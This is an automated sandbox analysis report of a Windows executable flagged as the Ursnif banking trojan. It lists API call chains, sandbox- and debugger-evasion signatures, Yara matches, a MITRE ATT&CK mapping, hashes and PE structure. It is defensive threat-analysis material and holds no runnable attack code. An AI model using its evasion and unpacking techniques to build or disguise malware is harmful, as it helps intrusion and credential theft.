Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_047E1D8A 0_2_047E1D8A
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_0040110B GetProcAddress,NtCreateSection,memset,0_2_0040110B
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_00401459 NtMapViewOfSection,0_2_00401459
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_004019F1 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_004019F1
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_047E421F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,0_2_047E421F
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_047E8551 NtQueryVirtualMemory,0_2_047E8551
Source: server.exe | ReversingLabs: Detection: 37%
Source: server.exe | Virustotal: Detection: 40%
Source: server.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\server.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_047E30D5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_047E30D5
Source: C:\Users\user\Desktop\server.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@1/0
Source: C:\Users\user\Desktop\server.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\server.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\server.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll

Data Obfuscation

Source: C:\Users\user\Desktop\server.exe | Unpacked PE file: 0.2.server.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\Desktop\server.exe | Unpacked PE file: 0.2.server.exe.400000.0.unpack
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_047E7F30 push ecx; ret 0_2_047E7F39
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_047E831B push ecx; ret 0_2_047E832B
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_00414680 push ecx; mov dword ptr [esp], 00000004h 0_2_00414681
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_004146A0 push ecx; mov dword ptr [esp], 00000000h 0_2_004146A1
Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_00401000 LoadLibraryA,GetProcAddress,0_2_00401000

          Hooking and other Techniques for Hiding and Protection

          Source: Yara match | File source: 00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.501403236.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.500947253.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.524941718.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.501177033.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.501140959.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.501379450.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.501210330.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: server.exe PID: 5276, type: MEMORYSTR
          Source: Yara match | File source: 0.2.server.exe.4e394a0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.server.exe.47e0000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000000.00000002.524890605.0000000004E39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\server.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\server.exe | Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
          Source: C:\Users\user\Desktop\server.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
          Source: C:\Users\user\Desktop\server.exe | API call chain: ExitProcess graph end node

          Anti Debugging

          Source: C:\Users\user\Desktop\server.exe | Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
          Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_00401000 LoadLibraryA,GetProcAddress | 0_2_00401000
          Source: C:\Users\user\Desktop\server.exe | Code function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError | 0_2_004019F1
          Source: C:\Users\user\Desktop\server.exe | Code function: __crtGetLocaleInfoA_stat | 0_2_00411E1C
          Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_047E3BD3 cpuid | 0_2_047E3BD3
          Source: C:\Users\user\Desktop\server.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_00401D68 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError | 0_2_00401D68
          Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_004015B0 GetSystemTimeAsFileTime,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError | 0_2_004015B0
          Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_047E3BD3 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree | 0_2_047E3BD3

          Stealing of Sensitive Information

          Source: Yara match | File source: 00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.501403236.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.500947253.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.524941718.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.501177033.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.501140959.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.501379450.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.501210330.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: server.exe PID: 5276, type: MEMORYSTR
          Source: Yara match | File source: 0.2.server.exe.4e394a0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.server.exe.47e0000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000000.00000002.524890605.0000000004E39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara match | File source: 00000000.00000003.501349661.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.501007098.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.501403236.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.500947253.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.524941718.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.501177033.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.501140959.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.501379450.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.501210330.0000000005428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: server.exe PID: 5276, type: MEMORYSTR
          Source: Yara match | File source: 0.2.server.exe.4e394a0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.server.exe.47e0000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000000.00000002.524890605.0000000004E39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          MITRE ATT&CK Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | 2 Windows Management Instrumentation | Path Interception | Path Interception | 1 Virtualization/Sandbox Evasion | OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 2 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 Data Encrypted for Impact
          Default Accounts | 12 Native API | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Obfuscated Files or Information | LSASS Memory | 1 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 1 Non-Application Layer Protocol | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 21 Software Packing | Security Account Manager | 1 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 Remote System Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 124 System Information Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue
          Behavior Graph (ID: 834121; Sample: server.exe; Start date: 24/03/2023; Architecture: WINDOWS; Score: 100)

          Start node signatures: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Yara detected Ursnif; Machine Learning detection for sample
          Process: server.exe (started)
          • DNS/IP: checklist.skype.com
          • Signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Found evasive API chain (may stop execution after checking system information); 3 other signatures

          Source | Detection | Scanner | Label
          server.exe | 38% | ReversingLabs |
          server.exe | 41% | Virustotal |
          server.exe | 100% | Joe Sandbox ML |
          No Antivirus matches
          Source | Detection | Scanner | Label
          0.2.server.exe.47e0000.2.unpack | 100% | Avira | HEUR/AGEN.1245293
          0.2.server.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen7


          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          checklist.skype.com | unknown | unknown | false | | high
            No contacted IP infos
            Joe Sandbox Version:37.0.0 Beryl
            Analysis ID:834121
            Start date and time:2023-03-24 14:00:16 +01:00
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 5m 10s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of new started processes analysed:13
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample file name:server.exe
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@1/0@1/0
            EGA Information:
            • Successful, ratio: 100%
            HDC Information:
            • Successful, ratio: 52% (good quality ratio 50.5%)
            • Quality average: 82.1%
            • Quality standard deviation: 26.5%
            HCA Information:
            • Successful, ratio: 98%
            • Number of executed functions: 45
            • Number of non-executed functions: 31
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): fs.microsoft.com
            • Not all processes were analyzed, report is missing behavior information
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            No simulations
            No context
            No created / dropped files found
            File type:PE32 executable (GUI) Intel 80386, for MS Windows
            Entropy (8bit):6.713055854715817
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.96%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:server.exe
            File size:251904
            MD5:62c6ed30422b5876110ee6ab6660223e
            SHA1:60e1a1c26d35c9d90fb163364e3a4deec1d4016a
            SHA256:fbb595a285f1126d4bfe09240e40b1a8a66ac5024f90b5e64860bb872e05a248
            SHA512:a5d124845b49428c7ffca0b81c063b81acdc84ef8d67511e9cb68489cd3baf1b3dd8420aff3b5972c4702da8fcad90c5fc3b7483bed1c03f9223475fc9760ec1
            SSDEEP:3072:VRESzcarU/edI7cTsSsuDwTHDXbtMJzWVCkeoQ0LTZ2eB25UWNObVr:eRNILMbJeW92eBoUj
            TLSH:54347C1273E1F960F52686328E1EC7FD6A3EB8E1DE55BF6E17449A3F0870261C662314
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........S...S...S...<...D...<.7.]...<.......Z.:.V...S...&...<...R...<.3.R...<.4.R...RichS...................PE..L......b...........
            Icon Hash:ba86124695b2aa92
            Entrypoint:0x404135
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            DLL Characteristics:TERMINAL_SERVER_AWARE
            Time Stamp:0x62E0E386 [Wed Jul 27 07:04:38 2022 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:5
            OS Version Minor:1
            File Version Major:5
            File Version Minor:1
            Subsystem Version Major:5
            Subsystem Version Minor:1
            Import Hash:4fc712efe0d5d011b63626c597ebe2a6
            Instruction
            call 00007F770CC325D4h
            jmp 00007F770CC2DA4Eh
            mov edi, edi
            push ebp
            mov ebp, esp
            mov eax, dword ptr [ebp+08h]
            xor ecx, ecx
            cmp eax, dword ptr [00417008h+ecx*8]
            je 00007F770CC2DBD5h
            inc ecx
            cmp ecx, 2Dh
            jc 00007F770CC2DBB3h
            lea ecx, dword ptr [eax-13h]
            cmp ecx, 11h
            jnbe 00007F770CC2DBD0h
            push 0000000Dh
            pop eax
            pop ebp
            ret
            mov eax, dword ptr [0041700Ch+ecx*8]
            pop ebp
            ret
            add eax, FFFFFF44h
            push 0000000Eh
            pop ecx
            cmp ecx, eax
            sbb eax, eax
            and eax, ecx
            add eax, 08h
            pop ebp
            ret
            call 00007F770CC2E864h
            test eax, eax
            jne 00007F770CC2DBC8h
            mov eax, 00417170h
            ret
            add eax, 08h
            ret
            call 00007F770CC2E851h
            test eax, eax
            jne 00007F770CC2DBC8h
            mov eax, 00417174h
            ret
            add eax, 0Ch
            ret
            mov edi, edi
            push ebp
            mov ebp, esp
            push esi
            call 00007F770CC2DBA7h
            mov ecx, dword ptr [ebp+08h]
            push ecx
            mov dword ptr [eax], ecx
            call 00007F770CC2DB47h
            pop ecx
            mov esi, eax
            call 00007F770CC2DB81h
            mov dword ptr [eax], esi
            pop esi
            pop ebp
            ret
            mov edi, edi
            push ebp
            mov ebp, esp
            call 00007F770CC2E816h
            test eax, eax
            jne 00007F770CC2DBC7h
            push 0000000Ch
            pop eax
            pop ebp
            ret
            call 00007F770CC2DB64h
            mov ecx, dword ptr [ebp+08h]
            mov dword ptr [eax], ecx
            xor eax, eax
            pop ebp
            ret
            mov edi, edi
            push ebp
            mov ebp, esp
            push esi
            mov esi, dword ptr [ebp+08h]
            test esi, esi
            jne 00007F770CC2DBCCh
            call 00007F770CC2EDFAh
            Programming Language:
            • [C++] VS2010 build 30319
            • [ASM] VS2010 build 30319
            • [ C ] VS2010 build 30319
            • [IMP] VS2008 SP1 build 30729
            • [RES] VS2010 build 30319
            • [LNK] VS2010 build 30319
            Name | Virtual Address | Virtual Size | Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x156a4 | 0x3c | .text
            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2756000 | 0x15530 | .rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x34f8 | 0x40 | .text
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x1dc | .text
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
            Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
            .text | 0x1000 | 0x1517c | 0x15200 | False | 0.5231139053254438 | data | 6.504969483391366 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .data | 0x17000 | 0x273e58c | 0x12c00 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .rsrc | 0x2756000 | 0x15530 | 0x15600 | False | 0.37751279239766083 | data | 4.359745306091667 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            Name | RVA | Size | Type | Language | Country
            BEKOJANIDURUPISO | 0x2768888 | 0xd96 | ASCII text, with very long lines (3478), with no line terminators | Sami Lappish | Finland
            BEKOJANIDURUPISO | 0x2768888 | 0xd96 | ASCII text, with very long lines (3478), with no line terminators | Sami Lappish | Norway
            BEKOJANIDURUPISO | 0x2768888 | 0xd96 | ASCII text, with very long lines (3478), with no line terminators | Sami Lappish | Sweden
            RELOWAZUXOKU | 0x2769620 | 0x598 | ASCII text, with very long lines (1432), with no line terminators | Sami Lappish | Finland
            RELOWAZUXOKU | 0x2769620 | 0x598 | ASCII text, with very long lines (1432), with no line terminators | Sami Lappish | Norway
            RELOWAZUXOKU | 0x2769620 | 0x598 | ASCII text, with very long lines (1432), with no line terminators | Sami Lappish | Sweden
            RT_ICON | 0x2756830 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Sami Lappish | Finland
            RT_ICON | 0x2756830 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Sami Lappish | Norway
            RT_ICON | 0x2756830 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Sami Lappish | Sweden
            RT_ICON | 0x27570d8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Finland
            RT_ICON | 0x27570d8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Norway
            RT_ICON | 0x27570d8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Sweden
            RT_ICON | 0x27581a8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Sami Lappish | Finland
            RT_ICON | 0x27581a8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Sami Lappish | Norway
            RT_ICON | 0x27581a8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Sami Lappish | Sweden
            RT_ICON | 0x2758a50 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Sami Lappish | Finland
            RT_ICON | 0x2758a50 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Sami Lappish | Norway
            RT_ICON | 0x2758a50 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Sami Lappish | Sweden
            RT_ICON | 0x275aff8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Finland
            RT_ICON | 0x275aff8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Norway
            RT_ICON | 0x275aff8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Sweden
            RT_ICON | 0x275c0d0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Sami Lappish | Finland
            RT_ICON | 0x275c0d0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Sami Lappish | Norway
            RT_ICON | 0x275c0d0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Sami Lappish | Sweden
            RT_ICON | 0x275cf78 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Sami Lappish | Finland
            RT_ICON | 0x275cf78 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Sami Lappish | Norway
            RT_ICON | 0x275cf78 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Sami Lappish | Sweden
            RT_ICON | 0x275d820 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Sami Lappish | Finland
            RT_ICON | 0x275d820 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Sami Lappish | Norway
            RT_ICON | 0x275d820 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Sami Lappish | Sweden
            RT_ICON | 0x275dee8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Sami Lappish | Finland
            RT_ICON | 0x275dee8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Sami Lappish | Norway
            RT_ICON | 0x275dee8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Sami Lappish | Sweden
            RT_ICON | 0x275e450 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Sami Lappish | Finland
            RT_ICON | 0x275e450 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Sami Lappish | Norway
            RT_ICON | 0x275e450 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Sami Lappish | Sweden
            RT_ICON | 0x27609f8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Sami Lappish | Finland
            RT_ICON | 0x27609f8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Sami Lappish | Norway
            RT_ICON | 0x27609f8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Sami Lappish | Sweden
            RT_ICON | 0x2761aa0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | Sami Lappish | Finland
            RT_ICON | 0x2761aa0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | Sami Lappish | Norway
            RT_ICON | 0x2761aa0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | Sami Lappish | Sweden
            RT_ICON | 0x2762428 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Sami Lappish | Finland
            RT_ICON | 0x2762428 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Sami Lappish | Norway
            RT_ICON | 0x2762428 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Sami Lappish | Sweden
            RT_ICON | 0x2762908 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Sami Lappish | Finland
            RT_ICON | 0x2762908 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Sami Lappish | Norway
            RT_ICON | 0x2762908 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Sami Lappish | Sweden
            RT_ICON | 0x27637b0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Sami Lappish | Finland
            RT_ICON | 0x27637b0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Sami Lappish | Norway
            RT_ICON | 0x27637b0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Sami Lappish | Sweden
            RT_ICON | 0x2763e78 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Sami Lappish | Finland
            RT_ICON | 0x2763e78 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Sami Lappish | Norway
            RT_ICON | 0x2763e78 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Sami Lappish | Sweden
            RT_ICON | 0x27643e0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Sami Lappish | Finland
            RT_ICON | 0x27643e0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Sami Lappish | Norway
            RT_ICON | 0x27643e0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Sami Lappish | Sweden
            RT_ICON | 0x2766988 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Finland
            RT_ICON | 0x2766988 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Norway
            RT_ICON | 0x2766988 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Sweden
            RT_ICON | 0x2767a30 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Sami Lappish | Finland
            RT_ICON | 0x2767a30 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Sami Lappish | Norway
            RT_ICON | 0x2767a30 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Sami Lappish | Sweden
            RT_ICON | 0x27683b8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Sami Lappish | Finland
            RT_ICON | 0x27683b8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Sami Lappish | Norway
            RT_ICON | 0x27683b8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Sami Lappish | Sweden
            RT_STRING | 0x2769ff0 | 0x4d6 | data | Sami Lappish | Finland
            RT_STRING | 0x2769ff0 | 0x4d6 | data | Sami Lappish | Norway
            RT_STRING | 0x2769ff0 | 0x4d6 | data | Sami Lappish | Sweden
